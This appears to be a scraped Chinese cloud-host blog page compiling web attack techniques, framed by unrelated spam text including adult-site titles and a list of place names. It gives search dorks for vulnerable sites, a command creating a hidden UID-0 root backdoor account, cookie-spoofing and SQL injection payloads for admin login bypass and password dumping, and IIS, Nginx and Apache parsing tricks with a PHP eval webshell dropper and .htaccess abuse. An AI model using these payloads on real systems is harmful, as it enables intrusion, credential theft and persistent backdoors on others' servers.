中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

各種web程序漏洞

發布時間:2020-06-06 03:59:16 來源:網絡 閱讀:1578 作者:190100425 欄目:安全技術


收集整理的各種web漏洞


struts2:

Inurl:index.action

Inurl:商城.action

Inurl:index.action 標題:apache struts2

Inurl:action?id=

site:.com inurl:index.action

inurl:dhis-web-commons


利用工具操作,賬號密碼添加:

useradd -u 0 -o -g root -G root -d /home/bingdao bingdao -p $1$jWIKT776$A8S37J9KR3Z4dpbJVX3rW0


賬號:bingdao 

密碼:1



生成加密密碼詳情:

以下為生成加密密碼命令(第一個1就是密碼):

echo "1" | openssl passwd -1 -salt $(< /dev/urandom tr -dc '[:alnum:]' | head -c 32) -stdin


生成的加密密碼:$1$Rfst5gRR$dqbE2NR0npnFMyeLchbk0/


然后添加權限為root的賬號和上面的密碼:

useradd -u 0 -o -g root -G root -d /home/lengyu lengyu -p'$1$Rfst5gRR$dqbE2NR0npnFMyeLchbk0/' 


就得到了賬號為“lengyu”,密碼為“1”的用戶,然后再ssh上去


------------------------------------------------------

szwyadmin cookies欺騙:

inurl:szwyadmin/login.asp

inurl:szwyadmin

代碼:

javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));javascript:alert(document.cookie="admindj="+escape("1"));


代碼復制然后回車。。~ 方便快捷。。然后關閉網頁重新打開后臺地址,然后在地址欄中將login.asp改為admin_index.asp 就直接進入后臺了,這種方法成功率百分之80以上。


另外這套程序還有一個爆密碼的oday。

使用方法很簡單。直接填寫域名然后點擊爆密碼。~~~  直接射出管理員帳號密碼。成功率不是很理想畢竟是很多的漏洞了.

-------------------------------------------------------------------------------------------------------------------------

南方數據:

inurl:HrDemand.asp

/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='

admin/southidceditor/admin_style.asp

--------------------------------------------

爆庫:


inurl:conn.asp


----------------

iis6 解析漏洞:

目錄解析  /xx.asp/xx.jpg

說明:在網站下建立文件夾的名字為 .asp 或 .asa 的文件夾,其目錄內的任何擴展名的文件都被IIS當作asp文件來解析并執行。

文件解析  1.asp;.jpg 

說明:會被服務器看成是1.asp還有IIS6.0 默認的可執行文件除了asp還包含這三種

/1.asa

/1.cer

/1.cdx


-----------------------------------

iis7.0/iis7.5/ nginx<8.03 畸形解析漏洞:


Nginx解析漏洞這個偉大的漏洞是我國安全組織80sec發現的…

在默認Fast-CGI開啟狀況下,黑闊上傳一個名字為1.jpg,內容為

  <?php fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

的文件,然后訪問1.jpg/.php,在這個目錄下就會生成一句話*** shell.php


------------------------------------------------------------------

Nginx <8.03 空字節代碼執行漏洞:


影響版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37

Nginx在圖片中嵌入PHP代碼然后通過訪問

xxx.jpg%00.php

來執行其中的代碼


----------------
Apache 解析漏洞

        Apache 是從右到左開始判斷解析,如果為不可識別解析,就再往左判斷.

比如 wooyun.php.owf.rar “.owf”和”.rar” 這兩種后綴是apache不可識別解析,apache就會把wooyun.php.owf.rar解析成php.

        如何判斷是不是合法的后綴就是這個漏洞的利用關鍵,測試時可以嘗試上傳一個wooyun.php.rara.jpg.png…(把你知道的常見后綴都寫上…)去測試是否是合法后綴

---------------------------------------------------

在windows環境下,xx.jpg[空格] 或xx.jpg. 這兩類文件都是不允許存在的,若這樣命名,windows會默認除去空格或點,***可以通過抓包,在文件名后加一個空格或者點繞過黑名單.若上傳成功,空格和點都會被windows自動消除,這樣也可以getshell。


如果在Apache中.htaccess可被執行.且可被上傳.那可以嘗試在.htaccess中寫入: 

<FilesMatch "1.jpg"> SetHandler application/x-httpd-php </FilesMatch>

然后再上傳shell.jpg的***, 這樣shell.jpg就可解析為php文件



向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

喀什市| 五华县| 淮安市| 东宁县| 炉霍县| 商洛市| 城口县| 绍兴县| 西宁市| 从化市| 白朗县| 浏阳市| 苍南县| 大足县| 博湖县| 乌兰察布市| 光山县| 广汉市| 兴安盟| 铅山县| 竹山县| 辉县市| 同江市| 夹江县| 察雅县| 西昌市| 南和县| 墨脱县| 西安市| 开封县| 双牌县| 五寨县| 乌兰县| 惠水县| 蚌埠市| 河津市| 阳东县| 搜索| 黄浦区| 精河县| 佳木斯市|